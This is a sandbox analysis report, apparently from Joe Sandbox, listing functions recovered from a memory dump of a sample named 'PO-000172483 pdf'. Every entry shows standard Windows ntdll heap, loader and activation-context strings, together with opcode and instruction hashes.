HEAP[%wZ]: , xrefs: 017F0399, 017F04A8, 017F05D0, 017F0675, 017F06CC
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 017F069F
Just reallocated block at %p to %Ix bytes, xrefs: 017F05F1

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: f33b95451b505405d7444c33fd0d568e88618890c7f439b1bc3c6869d154c9f8
Instruction ID: 40272a1c83b8b7ac6b3de5f922fd176929fdc9b5955c85cca33832f1baee407a
Opcode Fuzzy Hash: f33b95451b505405d7444c33fd0d568e88618890c7f439b1bc3c6869d154c9f8
Instruction Fuzzy Hash: D6D1C671600686DFDB26DF68C459AAAFBF2FF8A700F18804DEA459B353C7349980CB10

Function 017C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: -*- final list of providers -*- , xrefs: 017C8B8F
VerifierDebug, xrefs: 017C8CA5
VerifierFlags, xrefs: 017C8C50
HandleTraces, xrefs: 017C8C8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017C8A3D
VerifierDlls, xrefs: 017C8CBD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017C8A67

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 2b891f02a628075d568ac3726800053a7777b1318ac66d1c09c8f8192b0d6dd6
Instruction ID: 81d16ad15b1a79fc938ff39d317bef5547ecaa2d69f2918110e92f37e1621e8f
Opcode Fuzzy Hash: 2b891f02a628075d568ac3726800053a7777b1318ac66d1c09c8f8192b0d6dd6
Instruction Fuzzy Hash: 3F9135B1605712AFD731EF6CD884B1AFBA4AB94F14F09086CFA45AB245C770DE01CB92

Function 0174EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Enter, xrefs: 0174EB58
T, xrefs: 0174EB4E
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0174EB6C
{, xrefs: 017A4643
, xrefs: 0174F299
R, xrefs: 0174EB62

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: df85d7dcbd7bf9eac1a6dd9e7b8ce95190b5a319b8d3e4ec98112f330b37ccfa
Instruction ID: fbaa9829d2421c269a625dd84d38199e9c72303b5c2485169aeea9997e681db2
Opcode Fuzzy Hash: df85d7dcbd7bf9eac1a6dd9e7b8ce95190b5a319b8d3e4ec98112f330b37ccfa
Instruction Fuzzy Hash: 6CA24970A0562A8FDB64DF18CC887A9FBB5BF89314F5442E9D90EA7250DB759E80CF00

Function 017763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 017B41FE
Delaying execution failed with status 0x%08lx, xrefs: 017B4258
Process initialization failed with status 0x%08lx, xrefs: 017B413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 017B40D8
minkernel\ntdll\ldrinit.c, xrefs: 017B40E9, 017B414B, 017B420F, 017B4269
_LdrpInitialize, xrefs: 017B40DF, 017B4141, 017B4205, 017B425F

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 436f046b6d8994dea82aaed4c83cb3d0b8a06907495e3b7032f836150b26ef91
Instruction ID: e12505db87384b021bcf131c864997fc6d115e7393f1ebca86f524ab14be0620
Opcode Fuzzy Hash: 436f046b6d8994dea82aaed4c83cb3d0b8a06907495e3b7032f836150b26ef91
Instruction Fuzzy Hash: 68916C70B047159BEF35DF58D888BE9FBA1BF41B14F14016CFA026B28AD7748A01DB91

Function 0173645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017999ED
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01799A2A
LdrpInitShimEngine, xrefs: 017999F4, 01799A07, 01799A30
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01799A01
apphelp.dll, xrefs: 01736496
minkernel\ntdll\ldrinit.c, xrefs: 01799A11, 01799A3A

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 173af48b3cda3a3a87c7f5412ceb101c4dfa551e53d2c0cdce4d268785a58c7b
Instruction ID: a680bc8f95c91b7717e938a2a5d026fa4e80badc36b788d62ef4e3927dbc309e
Opcode Fuzzy Hash: 173af48b3cda3a3a87c7f5412ceb101c4dfa551e53d2c0cdce4d268785a58c7b
Instruction Fuzzy Hash: 8F51D371208301AFEB21DF24D855BABF7E4FB84648F04092DFA8597165D734EB04CB92

Function 01772674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017B2180
SXS: %s() passed the empty activation context, xrefs: 017B2165
RtlGetAssemblyStorageRoot, xrefs: 017B2160, 017B219A, 017B21BA
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017B21BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017B219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017B2178

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: f337ce952ea2f6c420fb624d54910d7a5964d9c2d1a01d48560814b0a70485f1
Instruction ID: 3d2553195cb4cd6885fae1784bcc09b8bfaafcedc8c959dd8e95872bc44c800b
Opcode Fuzzy Hash: f337ce952ea2f6c420fb624d54910d7a5964d9c2d1a01d48560814b0a70485f1
Instruction Fuzzy Hash: 3E313576B41229B7EB218A998D85F9AFA79DB64A50F05005DFB04AB202D370AF01C6E0

Function 0177C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 017B8181, 017B81F5
Unable to build import redirection Table, Status = 0x%x, xrefs: 017B81E5
LdrpInitializeImportRedirection, xrefs: 017B8177, 017B81EB
LdrpInitializeProcess, xrefs: 0177C6C4
minkernel\ntdll\ldrinit.c, xrefs: 0177C6C3
Loading import redirection DLL: '%wZ', xrefs: 017B8170

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 6b5e8415dbeac7e64926155667206464670a5fc767866a9a368fcd1fc1c079f9
Instruction ID: 405884f8c563961f775de06235336654dbdbbf2451aa94e58e802d125290dd8e
Opcode Fuzzy Hash: 6b5e8415dbeac7e64926155667206464670a5fc767866a9a368fcd1fc1c079f9
Instruction Fuzzy Hash: 0E312BB1644346ABC314EF29DC89E5AF7D8EF94B10F04055CFD45AB299D720ED05CBA2

Function 0178096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01782DF0: LdrInitializeThunk.NTDLL ref: 01782DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01780BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01780BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01780D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01780D74

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 8eeb76a2bee1b078afc6911dcd2200f9fa25be760f17983b97908489948badd1
Instruction ID: ddf135a854861ae532354ea7e434a840b1472ad55c9ef24661bd53e7115e5a82
Opcode Fuzzy Hash: 8eeb76a2bee1b078afc6911dcd2200f9fa25be760f17983b97908489948badd1
Instruction Fuzzy Hash: 18427DB1940705DFDB61DF28C884BAAB7F4BF48304F1445A9EA99EB245D770AA84CF60

Function 0174A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 0174A3E7
6, xrefs: 0174A3F7
LdrResFallbackLangList Enter, xrefs: 0174A3EF
LdrResFallbackLangList Exit, xrefs: 0174A3FF

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 898a3f21d35389c27d7ed4de585ef3d79cd690a219035118df843d4b1ab9b624
Instruction ID: a8770e5edf6cab338767e4794ad32b933c10c6f0350b0329b524ab9141ecba4a
Opcode Fuzzy Hash: 898a3f21d35389c27d7ed4de585ef3d79cd690a219035118df843d4b1ab9b624
Instruction Fuzzy Hash: 24C16875148382CFD711DF58C144B6AF7E4FF94704F0489AAF9968B251E734CA49CBA2

Function 01778402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0177855E
LdrpInitializeProcess, xrefs: 01778422
@, xrefs: 01778591
minkernel\ntdll\ldrinit.c, xrefs: 01778421

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 41590df5db8f9ff4874e2249452ffda7ffef53592bc8cb80eee012697224e17c
Instruction ID: 2a2c197b530d75bbe0934cbb885e957a57020e3e149ea2667484bfc5be1b1842
Opcode Fuzzy Hash: 41590df5db8f9ff4874e2249452ffda7ffef53592bc8cb80eee012697224e17c
Instruction Fuzzy Hash: 99917A71548345AFDB22EF25CC88FABFAE8BB84744F40092EFA8496155E774D904CB63

Function 0177273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017B22B6
SXS: %s() passed the empty activation context, xrefs: 017B21DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017B21D9, 017B22B1
.Local, xrefs: 017728D8

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 47eafdde8cb3796c0c4da37df556a53eda8e51abdb93a67d5c8fe27f7a0b9498
Instruction ID: 6eba5a2ad82bba391a1247c98381d48adffc77c57f2b69fa9b3df0950a179476
Opcode Fuzzy Hash: 47eafdde8cb3796c0c4da37df556a53eda8e51abdb93a67d5c8fe27f7a0b9498
Instruction Fuzzy Hash: 60A1CF31945229DBDF24CF68C888BE9F7B1BF58354F1901E9D918AB252D730AE81CF90

Function 01774AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017B3437
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017B3456
RtlDeactivateActivationContext, xrefs: 017B3425, 017B3432, 017B3451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 017B342A

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 537ffa8aba8b3358066a94e0abcec27aa1f1adce7c92d572e8e604500a5298a8
Instruction ID: 787227408eee74a242c8d79177b7efa9ba179263a0602179267e269d7dcf521c
Opcode Fuzzy Hash: 537ffa8aba8b3358066a94e0abcec27aa1f1adce7c92d572e8e604500a5298a8
Instruction Fuzzy Hash: FE611F726007129BDB22CF1CC881B7AF7E1AF80B60F14856DE9669B250DB34EC81CB91

Function 017464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017A1028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017A106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017A0FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017A10AE

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 375ed0931f66a55770385c06dfe91c38768d7e184755ac8306a8717f03770abe
Instruction ID: 05189ecff95f03929ebe9655e7314eab3f25cdec1f32cca1fed81ac934ef5143
Opcode Fuzzy Hash: 375ed0931f66a55770385c06dfe91c38768d7e184755ac8306a8717f03770abe
Instruction Fuzzy Hash: A871F2B19043459FCB21EF14C888B9BFFA9AF96764F500568F9488B14AD334D588CBD2

Function 01774D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017B362F
LdrpFindDllActivationContext, xrefs: 017B3636, 017B3662
Querying the active activation context failed with status 0x%08lx, xrefs: 017B365C
minkernel\ntdll\ldrsnap.c, xrefs: 017B3640, 017B366C

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 342fc0ad2afdf40bd03f499bcaafb6503037af4d9de2f104dcf2b234527be4f5
Instruction ID: c7356790f28c034546ceae72b32ba8741f13b1b65cefcc27dcf2ba5244527752
Opcode Fuzzy Hash: 342fc0ad2afdf40bd03f499bcaafb6503037af4d9de2f104dcf2b234527be4f5
Instruction Fuzzy Hash: 85314C72A00211AEEF33DB4CCC89B75F6A8FB01754F0A406AEB8757251D7A09DC087D5

Function 0176245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 017AA998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017AA992
apphelp.dll, xrefs: 01762462
minkernel\ntdll\ldrinit.c, xrefs: 017AA9A2

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: f57a4c2f234a3ae053d51758d8b20e7cf5f3639abc62827ad3632962efb5ffc2
Instruction ID: 61b2f285497d65c8bfc9c5d2314df46af55ee7bd0c2ce54160f408f00c68d81b
Opcode Fuzzy Hash: f57a4c2f234a3ae053d51758d8b20e7cf5f3639abc62827ad3632962efb5ffc2
Instruction Fuzzy Hash: 47312871A00202ABDB319F5DD885A7AFBB4FBC4700F690959ED016B249D7B49B41CB80

Function 017529A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01753264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0175327D
HEAP[%wZ]: , xrefs: 01753255

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 78310aeb5e1b9e1b47c977e86578aad232b5a0e1afaddd9cd2d901a2d81b973b
Instruction ID: 5006c83e75eb6b49ec5d40aadfa8854dfa30ca78215d881cbe0f786dc3f7e41d
Opcode Fuzzy Hash: 78310aeb5e1b9e1b47c977e86578aad232b5a0e1afaddd9cd2d901a2d81b973b
Instruction Fuzzy Hash: 0D92AA71A04249DFEB65CF68C444BAEFBF1FF48300F188499E859AB392D7B5A941CB50

Function 01750770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 017A50BD
(UCRBlock->Size >= *Size), xrefs: 017A50CA
HEAP[%wZ]: , xrefs: 017A50AE

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: b9eb0cc83a0884180c9fb4d33dac03d6eabbe1fdf13abc179a4eca07f84b10a7
Instruction ID: 6a360cfbed9bd1393b69acdb1d2c5fed3b0307e247b5bcf5af15a8f039389136
Opcode Fuzzy Hash: b9eb0cc83a0884180c9fb4d33dac03d6eabbe1fdf13abc179a4eca07f84b10a7
Instruction Fuzzy Hash: F1F1AC70A00606DFEB55CF68C894F6AF7B5FF84300F1442A8E9169B396D774EA81CB91

Function 01766962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 017ACA51
@, xrefs: 01766C24

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 5a91b142032bda486be629f95aa6a8d6b4dca2f2cf76162f6f849a153a2672f6
Instruction ID: c004c9a0f72a0c6773a45c31a9735c6d6a92204e3b6b55981ea2431cc1d09c04
Opcode Fuzzy Hash: 5a91b142032bda486be629f95aa6a8d6b4dca2f2cf76162f6f849a153a2672f6
Instruction Fuzzy Hash: 89C26E716083419FE72ACF28C881BABFBE9AFC8754F44896DF98987251D734D844CB52

Function 0173A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0179C1E4
UseFilter, xrefs: 0173A1C1
FilterFullPath, xrefs: 0179C2E6

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: d8fbf4edaab33c5a795b3829e6ecb9492eb30ba5170516023e420995dd60ffaa
Instruction ID: eb6d7693d70c8a18cf5700c47985b5f567d9ea33510a2e9dbdad94412389600e
Opcode Fuzzy Hash: d8fbf4edaab33c5a795b3829e6ecb9492eb30ba5170516023e420995dd60ffaa
Instruction Fuzzy Hash: B0A14D719116299BDF32DF68DC88BAAFBB8EF48710F1001E9D909A7251D7359E84CF50

Function 01760BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 017AA117
Failed to allocated memory for shimmed module list, xrefs: 017AA10F
minkernel\ntdll\ldrinit.c, xrefs: 017AA121

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 02aeb9049d2f664a16b47a679ec36930848e3789aa71740ba0e3b452f27374bb
Instruction ID: 3c08021b4b0ffd58c4b8c67311d0ea8be6ebac565c92231a8fe5f78768b3da5f
Opcode Fuzzy Hash: 02aeb9049d2f664a16b47a679ec36930848e3789aa71740ba0e3b452f27374bb
Instruction Fuzzy Hash: 7171A071A00205DFDB25DF68C984ABEF7F8FB88704F18456DE8069B259E774AE41CB50

Function 01750A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 017A5342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 017A534D
HEAP[%wZ]: , xrefs: 017A5335

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 7eefeebe4fceeabd8985d9684f880940d873d9362b4d6a56e0209440e8d72811
Instruction ID: 9a5c2656356c475536732ee8bad88d55b5bd21f28451419f9ace07640a249488
Opcode Fuzzy Hash: 7eefeebe4fceeabd8985d9684f880940d873d9362b4d6a56e0209440e8d72811
Instruction Fuzzy Hash: BF61B070600305DFDB69CF28C884B6AFBE1FF85708F148699F8558B296D7B0E981CB91

Function 0177C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 017B82DE
Failed to reallocate the system dirs string !, xrefs: 017B82D7
minkernel\ntdll\ldrinit.c, xrefs: 017B82E8

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 537b2ecb5cf992ee1cb32c3a875ac6961047026d12c3a9eb4d8e2e8d87cdad15
Instruction ID: babe8ef06a58b2e789e904ee84bc4926dc6199a3403b21f5f1883f9eeb4c6bcf
Opcode Fuzzy Hash: 537b2ecb5cf992ee1cb32c3a875ac6961047026d12c3a9eb4d8e2e8d87cdad15
Instruction Fuzzy Hash: D041E471544302ABCB22EB68DD49B9BF7E8AF48750F14492AF954D3255FBB0DA008BD1

Function 017FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017FC1C5
@, xrefs: 017FC1F1
PreferredUILanguages, xrefs: 017FC212

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: dcfc7b33461131e2c47bcafe0e9025b93d73abb2b9e023de3b08e8f8876435d0
Instruction ID: 8c19893b58c04d47dbdda42e8762cdc8e575480e0b1469cd19769e382acd1202
Opcode Fuzzy Hash: dcfc7b33461131e2c47bcafe0e9025b93d73abb2b9e023de3b08e8f8876435d0
Instruction Fuzzy Hash: 9F416175E4420DEBDB12DAD8C855FEFFBB8EB18700F14406AEA09A7244D7749A44CB50

Function 017D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 017D4172
LdrpResValidateFilePath Enter, xrefs: 017D4160
@, xrefs: 017D4225

Memory Dump Source

Source File: 00000007.00000002.2611864030.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_PO-000172483 pdf.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 8fdfb190e98f8a1a8db76f2413fd6f9d7a74904c7bd792ddf941e53a317e1c97
Instruction ID: f89aff12cd5a4c762446c2a8797c1515724f3873acd235ec236e81fd95137f2f
